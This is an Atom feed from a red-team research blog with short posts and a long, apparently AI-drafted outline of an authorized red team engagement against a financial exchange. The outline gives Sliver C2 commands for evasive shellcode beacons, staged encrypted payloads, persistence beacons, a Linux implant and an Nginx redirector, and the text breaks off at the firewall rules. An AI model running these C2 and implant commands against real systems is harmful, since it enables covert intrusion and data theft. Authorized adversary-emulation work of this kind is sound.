<?xml version="1.0" encoding="UTF-8"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
    <title>Zerokoan Research</title>
    <subtitle>Security research, vulnerability analysis, technical findings, with an emphasis on Red Team operations</subtitle>
    <link rel="self" type="application/atom+xml" href="https://zerokoan.com/atom.xml"/>
    <link rel="alternate" type="text/html" href="https://zerokoan.com"/>
    <generator uri="https://www.getzola.org/">Zola</generator>
    <updated>2026-04-30T00:00:00+00:00</updated>
    <id>https://zerokoan.com/atom.xml</id>
    <entry xml:lang="en">
        <title>That Overlook Shine</title>
        <published>2026-04-30T00:00:00+00:00</published>
        <updated>2026-04-30T00:00:00+00:00</updated>
        
        <author>
          <name>
            
              Unknown
            
          </name>
        </author>
        
        <link rel="alternate" type="text/html" href="https://zerokoan.com/blog/260430-that-overlook-shine/"/>
        <id>https://zerokoan.com/blog/260430-that-overlook-shine/</id>
        
        <content type="html" xml:base="https://zerokoan.com/blog/260430-that-overlook-shine/">&lt;h2 id=&quot;why-get-paid-when-you-can-optimize-free-work-efficiency&quot;&gt;Why Get Paid When You Can Optimize Free Work Efficiency&lt;&#x2F;h2&gt;
&lt;p&gt;Going to start working through HackTheBox and OffSec&#x27;s Proving Grounds boxes to refresh technical knowledge, but also to feel out changes to a couple workflows.&lt;&#x2F;p&gt;
&lt;p&gt;Ultimately, I hope to have:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;Obsidian vault with templates to ensure consistency and completeness of notetaking approach&lt;&#x2F;li&gt;
&lt;li&gt;Notes from an assessment within dedicated folder at apex, with screenshots and other supporting evidence &lt;em&gt;somewhere&lt;&#x2F;em&gt; also in the apex&lt;&#x2F;li&gt;
&lt;li&gt;From the notes, a rough skeleton with screenshots and code snippets (potentially using creation timestamps to associate screenshots with related notes and code)&lt;&#x2F;li&gt;
&lt;li&gt;From the rough skeleton, an initial draft of the related writeup&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
</content>
        
    </entry>
    <entry xml:lang="en">
        <title>PG: clone</title>
        <published>2026-04-29T00:00:00+00:00</published>
        <updated>2026-04-29T00:00:00+00:00</updated>
        
        <author>
          <name>
            
              Unknown
            
          </name>
        </author>
        
        <link rel="alternate" type="text/html" href="https://zerokoan.com/archive/pg/clone/"/>
        <id>https://zerokoan.com/archive/pg/clone/</id>
        
        <content type="html" xml:base="https://zerokoan.com/archive/pg/clone/"></content>
        
    </entry>
    <entry xml:lang="en">
        <title>PG: press</title>
        <published>2026-04-29T00:00:00+00:00</published>
        <updated>2026-04-29T00:00:00+00:00</updated>
        
        <author>
          <name>
            
              Unknown
            
          </name>
        </author>
        
        <link rel="alternate" type="text/html" href="https://zerokoan.com/archive/pg/press/"/>
        <id>https://zerokoan.com/archive/pg/press/</id>
        
        <content type="html" xml:base="https://zerokoan.com/archive/pg/press/"></content>
        
    </entry>
    <entry xml:lang="en">
        <title>Intention</title>
        <published>2026-04-17T00:00:00+00:00</published>
        <updated>2026-04-17T00:00:00+00:00</updated>
        
        <author>
          <name>
            
              Unknown
            
          </name>
        </author>
        
        <link rel="alternate" type="text/html" href="https://zerokoan.com/blog/260417-intention/"/>
        <id>https://zerokoan.com/blog/260417-intention/</id>
        
        <content type="html" xml:base="https://zerokoan.com/blog/260417-intention/">&lt;p&gt;If not obvious, this whole thing is very much under construction, with constant change both threatened and delivered.&lt;&#x2F;p&gt;
&lt;p&gt;Most of what I&#x27;d worked on previously is just hilariously out of date or just in need of major revision, so I&#x27;ve elected to remove it all and start anew.&lt;&#x2F;p&gt;
&lt;p&gt;Security research focused on helping Blue by imitating Red, before Red&lt;sub&gt;actual&lt;&#x2F;sub&gt; can do any damage. Breaking is easy; building is so much more difficult.&lt;&#x2F;p&gt;
&lt;p&gt;Currently, overall categories I&#x27;m lumping research under:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;Red Team
&lt;ul&gt;
&lt;li&gt;Kind of a catchall for something that&#x27;s related to Red Team operations. Some things will fall under other, more specific categories as well&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;&#x2F;li&gt;
&lt;li&gt;Web Assessment
&lt;ul&gt;
&lt;li&gt;Think GWAPT and OSWA&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;&#x2F;li&gt;
&lt;li&gt;Network Assessment
&lt;ul&gt;
&lt;li&gt;GPEN, OSCP&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;&#x2F;li&gt;
&lt;li&gt;Reconnaissance
&lt;ul&gt;
&lt;li&gt;OSINT, attack surface mapping, etc&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;&#x2F;li&gt;
&lt;li&gt;AI
&lt;ul&gt;
&lt;li&gt;Getting into the grift before I&#x27;m adrift&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;&#x2F;li&gt;
&lt;li&gt;Vulnerabilities
&lt;ul&gt;
&lt;li&gt;GXPN&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;&#x2F;li&gt;
&lt;li&gt;Threat Intelligence
&lt;ul&gt;
&lt;li&gt;APTs, Kill Chains, etc. Not really focused on IOCs, but more the techniques and tooling used&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
</content>
        
    </entry>
    <entry xml:lang="en">
        <title>Claude v Finance</title>
        <published>2026-04-16T00:00:00+00:00</published>
        <updated>2026-04-16T00:00:00+00:00</updated>
        
        <author>
          <name>
            
              Unknown
            
          </name>
        </author>
        
        <link rel="alternate" type="text/html" href="https://zerokoan.com/archive/rt/claude-red-team-engagement-outline-financial/"/>
        <id>https://zerokoan.com/archive/rt/claude-red-team-engagement-outline-financial/</id>
        
        <content type="html" xml:base="https://zerokoan.com/archive/rt/claude-red-team-engagement-outline-financial/">&lt;h1 id=&quot;red-team-engagement-outline-financial-exchange-organization&quot;&gt;Red Team Engagement Outline: Financial Exchange Organization&lt;&#x2F;h1&gt;
&lt;h3 id=&quot;u-s-industrial-standards-alignment-sliver-c2-iran-israel-russia-dprk-cybercriminal-apt-coverage&quot;&gt;U.S. Industrial Standards Alignment | Sliver C2 | Iran &#x2F; Israel &#x2F; Russia &#x2F; DPRK &#x2F; Cybercriminal APT Coverage&lt;&#x2F;h3&gt;
&lt;hr &#x2F;&gt;
&lt;h2 id=&quot;regulatory-standards-framework&quot;&gt;Regulatory &amp;amp; Standards Framework&lt;&#x2F;h2&gt;
&lt;p&gt;This engagement is structured against the full current U.S. regulatory stack for financial exchanges:&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;NIST CSF 2.0 (Feb 2024)&lt;&#x2F;strong&gt; — The primary successor to the FFIEC CAT, with roughly 81% of U.S.-based financial institutions reporting partial or full NIST CSF adoption in 2024 for mapping to FFIEC and SEC guidelines. CSF 2.0 introduces a sixth &lt;strong&gt;Govern&lt;&#x2F;strong&gt; function alongside the original five (Identify, Protect, Detect, Respond, Recover), providing the board-level accountability framework within which this engagement operates.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;FFIEC CAT Retirement (Aug 31, 2025)&lt;&#x2F;strong&gt; — The FFIEC CAT was retired effective August 31, 2025. OCC Bulletin 2024-25 directs institutions to adopt any industry-standard cybersecurity framework — NIST CSF 2.0 and the CISA Cybersecurity Performance Goals are the recognized successors.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;NIST SP 800-115&lt;&#x2F;strong&gt; — The federal technical standard governing the four-phase penetration test methodology used throughout this engagement. PCI DSS 4.0 explicitly cites NIST SP 800-115 as an accepted penetration testing methodology, alongside OSSTMM, OWASP, and PTES.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;NIST SP 800-53 Rev. 5&lt;&#x2F;strong&gt; — Security control catalog for findings mapping, particularly CA-8 (Penetration Testing).&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;SEC Cybersecurity Disclosure Rules (Dec 2023)&lt;&#x2F;strong&gt; — Public companies must file current reports on material cybersecurity incidents within four business days of a materiality determination, and provide annual disclosure on risk management, strategy, and governance in their Form 10-K.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;NYDFS 23 NYCRR Part 500 (2nd Amendment, Nov 2023)&lt;&#x2F;strong&gt; — The 2023 amendments specify that annual penetration testing must be conducted from both inside and outside the information systems&#x27; boundaries, with new requirements for monitoring privileged access and implementing endpoint detection and response solutions. Under Section 500.17(b), the annual compliance notification must be signed by both the entity&#x27;s highest-ranking executive and its CISO, creating personal liability for senior leadership.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;PCI DSS 4.0 (mandatory Mar 31, 2025)&lt;&#x2F;strong&gt; — Requirement 11.3.1 mandates external network penetration tests of internet-facing environments at least annually; internal tests are required under 11.3.2.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;CRI Cyber Profile 2.0&lt;&#x2F;strong&gt; — The Cyber Risk Institute&#x27;s financial-sector extension of NIST CSF, knitting together 2,500 regulatory expectations in 318 control objectives and mapping directly to MITRE ATT&amp;amp;CK v16.1.&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;h2 id=&quot;phase-1-pre-engagement-governance-authorization&quot;&gt;Phase 1 — Pre-Engagement: Governance &amp;amp; Authorization&lt;&#x2F;h2&gt;
&lt;h3 id=&quot;1-1-legal-authorization-rules-of-engagement&quot;&gt;1.1 Legal Authorization &amp;amp; Rules of Engagement&lt;&#x2F;h3&gt;
&lt;p&gt;All testing requires written authorization under the &lt;strong&gt;Computer Fraud and Abuse Act (CFAA, 18 U.S.C. § 1030)&lt;&#x2F;strong&gt; before any active activity begins. Required documents:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Master Service Agreement (MSA)&lt;&#x2F;strong&gt; with indemnification and liability caps&lt;&#x2F;li&gt;
&lt;li&gt;&lt;strong&gt;Scope of Work (SOW)&lt;&#x2F;strong&gt; defining in-scope systems, IP ranges, personas, and excluded targets&lt;&#x2F;li&gt;
&lt;li&gt;&lt;strong&gt;Rules of Engagement (RoE)&lt;&#x2F;strong&gt; specifying blackout windows (market hours, settlement cycles), emergency stop&#x2F;kill-switch procedures, and escalation contacts&lt;&#x2F;li&gt;
&lt;li&gt;&lt;strong&gt;CFAA Authorization Letter&lt;&#x2F;strong&gt; signed by an authorized officer explicitly permitting simulated attacks&lt;&#x2F;li&gt;
&lt;li&gt;&lt;strong&gt;Deconfliction Protocol&lt;&#x2F;strong&gt; for coordinating with the SOC and any regulators monitoring the target during the engagement period&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;h3 id=&quot;1-2-control-team-structure&quot;&gt;1.2 Control Team Structure&lt;&#x2F;h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;White Cell&lt;&#x2F;strong&gt; — CISO + Legal + designated board member; only internal parties who know the test is live&lt;&#x2F;li&gt;
&lt;li&gt;&lt;strong&gt;Red Team&lt;&#x2F;strong&gt; — External provider conducting adversarial simulation&lt;&#x2F;li&gt;
&lt;li&gt;&lt;strong&gt;Blue Team&lt;&#x2F;strong&gt; — SOC and defenders with no knowledge of the engagement (covert phase); joined later for purple team&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;h3 id=&quot;1-3-crown-jewel-asset-register&quot;&gt;1.3 Crown Jewel Asset Register&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;em&gt;(Aligned to NIST CSF 2.0 ID.AM and NYDFS §500.13)&lt;&#x2F;em&gt;&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;Trade Order Management System (OMS) and matching engine&lt;&#x2F;li&gt;
&lt;li&gt;SWIFT&#x2F;FIN messaging endpoints and connectivity&lt;&#x2F;li&gt;
&lt;li&gt;Clearing &amp;amp; Settlement (CCP processing layer)&lt;&#x2F;li&gt;
&lt;li&gt;Market data dissemination feeds&lt;&#x2F;li&gt;
&lt;li&gt;Internal Certificate Authority and PKI&lt;&#x2F;li&gt;
&lt;li&gt;Active Directory &#x2F; Entra ID backbone&lt;&#x2F;li&gt;
&lt;li&gt;Privileged Access Workstations (PAWs) and jump hosts&lt;&#x2F;li&gt;
&lt;li&gt;Backup and DR systems&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;hr &#x2F;&gt;
&lt;h2 id=&quot;phase-2-threat-intelligence-report&quot;&gt;Phase 2 — Threat Intelligence Report&lt;&#x2F;h2&gt;
&lt;p&gt;Produced prior to active testing per &lt;strong&gt;NIST SP 800-30 Rev. 1&lt;&#x2F;strong&gt; (Risk Assessment) and &lt;strong&gt;NIST CSF 2.0 ID.RA&lt;&#x2F;strong&gt;. Satisfies NYDFS §500.9 risk assessment requirements and NIST 800-53 RA-3.&lt;&#x2F;p&gt;
&lt;p&gt;Between April 2024 and April 2025, analysts observed 6,406 dark web forum posts pertaining to financial sector access listings, with ransomware attacks, initial access brokers, third-party compromises, and insider threats among the primary documented attack vectors.&lt;&#x2F;p&gt;
&lt;p&gt;The report covers:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;Active APT groups with financial exchange TTPs (Phases 3–7)&lt;&#x2F;li&gt;
&lt;li&gt;Recently weaponized CVEs against FSI targets&lt;&#x2F;li&gt;
&lt;li&gt;OSINT: public-facing infrastructure, employee exposure, dark web credential listings&lt;&#x2F;li&gt;
&lt;li&gt;MITRE ATT&amp;amp;CK v16.1 Navigator threat heatmap for the target&lt;&#x2F;li&gt;
&lt;li&gt;Risk scoring using NIST SP 800-30 likelihood × impact methodology&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;hr &#x2F;&gt;
&lt;h2 id=&quot;phase-3-c2-infrastructure-sliver-framework&quot;&gt;Phase 3 — C2 Infrastructure: Sliver Framework&lt;&#x2F;h2&gt;
&lt;h3 id=&quot;why-sliver&quot;&gt;Why Sliver&lt;&#x2F;h3&gt;
&lt;p&gt;Sliver is an open-source cross-platform adversary emulation&#x2F;red team framework developed by BishopFox. Implants support C2 over Mutual TLS (mTLS), WireGuard, HTTP(S), and DNS, and are dynamically compiled with per-binary asymmetric encryption keys. The server and client support macOS, Windows, and Linux.&lt;&#x2F;p&gt;
&lt;p&gt;Importantly, APT29 (Cozy Bear) has used Sliver in intrusion campaigns to build robust C2 infrastructures — making Sliver emulation highly realistic for financial exchange red team scenarios.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;infrastructure-architecture&quot;&gt;Infrastructure Architecture&lt;&#x2F;h3&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #FFFFFF; background-color: #262335;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;[Operators] --&amp;gt; [Sliver Team Server] --&amp;gt; [Nginx&#x2F;Apache Redirectors] --&amp;gt; [Implants on Target]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Sliver implements a distributed architecture that clearly separates server, client, and operator components, allowing maximum operational flexibility. Redirectors should be positioned between the server backend and implants to protect team server identity.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;c2-channel-selection-by-scenario&quot;&gt;C2 Channel Selection by Scenario&lt;&#x2F;h3&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Protocol&lt;&#x2F;th&gt;&lt;th&gt;Use Case&lt;&#x2F;th&gt;&lt;th&gt;Sliver Command&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;strong&gt;HTTPS&lt;&#x2F;strong&gt;&lt;&#x2F;td&gt;&lt;td&gt;Primary exfiltration channel; blends with web traffic through Nginx redirector&lt;&#x2F;td&gt;&lt;td&gt;&lt;code&gt;sliver&amp;gt; https --lhost 0.0.0.0 --lport 443 --domain &amp;lt;c2_domain&amp;gt;&lt;&#x2F;code&gt;&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;strong&gt;mTLS&lt;&#x2F;strong&gt;&lt;&#x2F;td&gt;&lt;td&gt;Encrypted internal pivot channel; mutual certificate auth&lt;&#x2F;td&gt;&lt;td&gt;&lt;code&gt;sliver&amp;gt; mtls --lhost 0.0.0.0 --lport 8888&lt;&#x2F;code&gt;&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;strong&gt;WireGuard&lt;&#x2F;strong&gt;&lt;&#x2F;td&gt;&lt;td&gt;Stealthy tunnel for long-dwell operations; VPN-like encapsulation&lt;&#x2F;td&gt;&lt;td&gt;&lt;code&gt;sliver&amp;gt; wg --lport 53&lt;&#x2F;code&gt;&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;strong&gt;DNS&lt;&#x2F;strong&gt;&lt;&#x2F;td&gt;&lt;td&gt;Egress through restrictive firewalls; slow beacon for low-noise ops&lt;&#x2F;td&gt;&lt;td&gt;&lt;code&gt;sliver&amp;gt; dns --domains &amp;lt;c2_domain&amp;gt;&lt;&#x2F;code&gt;&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;h3 id=&quot;implant-generation&quot;&gt;Implant Generation&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;strong&gt;Primary Windows HTTPS beacon (staged, evasive):&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #FFFFFF; background-color: #262335;&quot;&gt;&lt;code data-lang=&quot;shellscript&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #848BBD;font-style: italic;&quot;&gt;# Create reusable beacon profile&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #FE4450;&quot;&gt;sliver&lt;&#x2F;span&gt;&lt;span&gt;&amp;gt; profiles new beacon&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F97E72;&quot;&gt; --http&lt;&#x2F;span&gt;&lt;span&gt; https:&#x2F;&#x2F;sliver-redirector.com&lt;&#x2F;span&gt;&lt;span style=&quot;color: #36F9F6;&quot;&gt; \&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F97E72;&quot;&gt;  --os&lt;&#x2F;span&gt;&lt;span&gt; windows&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F97E72;&quot;&gt; --format&lt;&#x2F;span&gt;&lt;span&gt; shellcode&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F97E72;&quot;&gt; --evasion&lt;&#x2F;span&gt;&lt;span&gt; https-win&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #848BBD;font-style: italic;&quot;&gt;# Generate staged beacon with gzip + AES-encrypted stage-1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #FE4450;&quot;&gt;sliver&lt;&#x2F;span&gt;&lt;span&gt;&amp;gt; stage-listener&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F97E72;&quot;&gt; --url&lt;&#x2F;span&gt;&lt;span&gt; http:&#x2F;&#x2F;sliver-domain:80&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F97E72;&quot;&gt; --profile&lt;&#x2F;span&gt;&lt;span&gt; https-win&lt;&#x2F;span&gt;&lt;span style=&quot;color: #36F9F6;&quot;&gt; \&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F97E72;&quot;&gt;  --compress&lt;&#x2F;span&gt;&lt;span&gt; gzip&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F97E72;&quot;&gt; --aes-encrypt-key&lt;&#x2F;span&gt;&lt;span style=&quot;color: #FF8B39;&quot;&gt; &amp;quot;&amp;lt;key&amp;gt;&amp;quot;&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F97E72;&quot;&gt; --aes-encrypt-iv&lt;&#x2F;span&gt;&lt;span style=&quot;color: #FF8B39;&quot;&gt; &amp;quot;&amp;lt;iv&amp;gt;&amp;quot;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;&lt;strong&gt;Multi-channel failover beacon (mTLS → HTTPS → DNS):&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #FFFFFF; background-color: #262335;&quot;&gt;&lt;code data-lang=&quot;shellscript&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #FE4450;&quot;&gt;sliver&lt;&#x2F;span&gt;&lt;span&gt;&amp;gt; generate&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F97E72;&quot;&gt; --mtls&lt;&#x2F;span&gt;&lt;span style=&quot;color: #FEDE5D;&quot;&gt; &amp;lt;&lt;&#x2F;span&gt;&lt;span&gt;ip&lt;&#x2F;span&gt;&lt;span style=&quot;color: #FEDE5D;&quot;&gt;&amp;gt;&lt;&#x2F;span&gt;&lt;span&gt;:8888&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F97E72;&quot;&gt; --http&lt;&#x2F;span&gt;&lt;span style=&quot;color: #FEDE5D;&quot;&gt; &amp;lt;&lt;&#x2F;span&gt;&lt;span&gt;c2_domain&lt;&#x2F;span&gt;&lt;span style=&quot;color: #FEDE5D;&quot;&gt;&amp;gt;&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F97E72;&quot;&gt; --dns&lt;&#x2F;span&gt;&lt;span style=&quot;color: #FEDE5D;&quot;&gt; &amp;lt;&lt;&#x2F;span&gt;&lt;span&gt;c2_domain&lt;&#x2F;span&gt;&lt;span style=&quot;color: #FEDE5D;&quot;&gt;&amp;gt;&lt;&#x2F;span&gt;&lt;span style=&quot;color: #36F9F6;&quot;&gt; \&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F97E72;&quot;&gt;  --os&lt;&#x2F;span&gt;&lt;span&gt; windows&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F97E72;&quot;&gt; --arch&lt;&#x2F;span&gt;&lt;span&gt; amd64&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F97E72;&quot;&gt; --format&lt;&#x2F;span&gt;&lt;span&gt; shellcode&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F97E72;&quot;&gt; --evasion&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;&lt;strong&gt;Long-dwell beacon with jitter (APT persistence emulation):&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #FFFFFF; background-color: #262335;&quot;&gt;&lt;code data-lang=&quot;shellscript&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #FE4450;&quot;&gt;sliver&lt;&#x2F;span&gt;&lt;span&gt;&amp;gt; profiles new beacon&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F97E72;&quot;&gt; --http&lt;&#x2F;span&gt;&lt;span&gt; https:&#x2F;&#x2F;sliver-redirector.com&lt;&#x2F;span&gt;&lt;span style=&quot;color: #36F9F6;&quot;&gt; \&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F97E72;&quot;&gt;  --os&lt;&#x2F;span&gt;&lt;span&gt; windows&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F97E72;&quot;&gt; --format&lt;&#x2F;span&gt;&lt;span&gt; exe&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F97E72;&quot;&gt; --name&lt;&#x2F;span&gt;&lt;span&gt; apt-persist&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #FE4450;&quot;&gt;sliver&lt;&#x2F;span&gt;&lt;span&gt;&amp;gt; profiles beacon-interval&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F97E72;&quot;&gt; --profile&lt;&#x2F;span&gt;&lt;span&gt; apt-persist&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F97E72;&quot;&gt; --seconds 3600 --jitter 30&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;&lt;strong&gt;Linux implant for server-side pivot:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #FFFFFF; background-color: #262335;&quot;&gt;&lt;code data-lang=&quot;shellscript&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #FE4450;&quot;&gt;sliver&lt;&#x2F;span&gt;&lt;span&gt;&amp;gt; generate beacon&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F97E72;&quot;&gt; --http&lt;&#x2F;span&gt;&lt;span&gt; https:&#x2F;&#x2F;sliver-redirector.com&lt;&#x2F;span&gt;&lt;span style=&quot;color: #36F9F6;&quot;&gt; \&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F97E72;&quot;&gt;  --os&lt;&#x2F;span&gt;&lt;span&gt; linux&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F97E72;&quot;&gt; --arch&lt;&#x2F;span&gt;&lt;span&gt; amd64&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F97E72;&quot;&gt; --evasion --save&lt;&#x2F;span&gt;&lt;span&gt; &#x2F;output&#x2F;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h3 id=&quot;redirector-configuration-nginx&quot;&gt;Redirector Configuration (Nginx)&lt;&#x2F;h3&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #FFFFFF; background-color: #262335;&quot;&gt;&lt;code data-lang=&quot;nginx&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #FEDE5D;&quot;&gt;location&lt;&#x2F;span&gt;&lt;span style=&quot;color: #FE4450;&quot;&gt; &#x2F; &lt;&#x2F;span&gt;&lt;span&gt;{&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #FEDE5D;&quot;&gt;    proxy_pass&lt;&#x2F;span&gt;&lt;span&gt; https:&#x2F;&#x2F;&amp;lt;sliver-teamserver-ip&amp;gt;:443;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #FEDE5D;&quot;&gt;    proxy_ssl_verify&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F97E72;&quot;&gt; off&lt;&#x2F;span&gt;&lt;span&gt;;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #FEDE5D;&quot;&gt;    proxy_set_header&lt;&#x2F;span&gt;&lt;span&gt; Host $&lt;&#x2F;span&gt;&lt;span style=&quot;color: #FF7EDB;&quot;&gt;host&lt;&#x2F;span&gt;&lt;span&gt;;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #FEDE5D;&quot;&gt;    proxy_set_header&lt;&#x2F;span&gt;&lt;span&gt; X-Real-IP $&lt;&#x2F;span&gt;&lt;span style=&quot;color: #FF7EDB;&quot;&gt;remote_addr&lt;&#x2F;span&gt;&lt;span&gt;;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Team server firewall rules — only accept connections from redirector:&lt;&#x2F;p&gt;
